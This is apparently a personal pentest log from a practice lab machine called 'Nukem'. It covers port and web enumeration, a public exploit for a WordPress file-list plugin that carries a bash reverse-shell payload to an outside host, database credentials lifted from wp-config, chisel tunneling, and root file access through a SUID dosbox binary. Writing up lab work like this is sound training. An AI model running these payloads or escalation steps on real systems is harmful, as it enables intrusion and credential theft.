Nukem
๐งช Pentest Log: {{date:2025-08-11}}
๐ Target Information
- Machine Name: Nukem
- IP Address: 192.168.199.105
- Operating System: Linux
ip=192.168.199.105
๐ก Enumeration
๐ Port Scanning
Command Used
ports=$(nmap -p- --min-rate=1000 -T4 $ip | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -p$ports -sC -sV $ip -oN tcp_scan_result.txt
nmap -sU --top-ports 100 $ip -oN udp_scan_result.txt
Port 22
Port 80
Web Directory Scan
gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/common.txt
wpscan --url http://$ip
dirsearch -u http://$ip -r -o dirsearch.txt
curl -s http://$ip/ | html2markdown
Found WordPress Plugin Simple File List 4.2.2, Google for exploit, found
https://www.exploit-db.com/exploits/48979
Port 3306
Port 5000
Port 13000
Port 36445
๐ฃ Exploitation
๐ Vulnerability Summary
- Service / Port: 80
- Vulnerability Type: RCE
๐ Exploit Execution
๐ง Exploit Method
Tool / Script Used:
https://www.exploit-db.com/exploits/48979
payload = '<?php passthru("bash -i >& /dev/tcp/192.168.45.163/80 0>&1"); ?>'
python3 48979.py http://$ip
python3 /home/kali/Documents/oscp/penelope/penelope.py -p 80
๐งฌ Privilege Escalation
๐ค Current Access
- User: http
- Groups: http
- Shell Type: reverse shell
๐ Enumeration
wp-config:
/** MySQL database username */
define( 'DB_USER', 'commander' );
/** MySQL database password */
define( 'DB_PASSWORD', 'CommanderKeenVorticons1990' );
SSH Login commander, found SUID binary
/usr/bin/dosbox
๐ Privilege Escalation Exploit
๐ Exploit Summary
- Technique Used: SUID Abuse
- Target Binary/Service: dosbox
- Reference / Source: GTFOBins
๐ง Exploit Steps
- Setup
chisel server -socks5 -reverse -p 13000
./chisel client -fingerprint 'Mw736WOkSW4tx6RuZ03u8IVjaU6FmfBlwFmxJhX1BPc=' 192.168.45.163:13000 R:5901:127.0.0.1:5901
vncviewer -passwd passwd 127.0.0.1:5901
- Smash to root
dosbox -c 'mount c /' -c "type c:$LFILE"
C: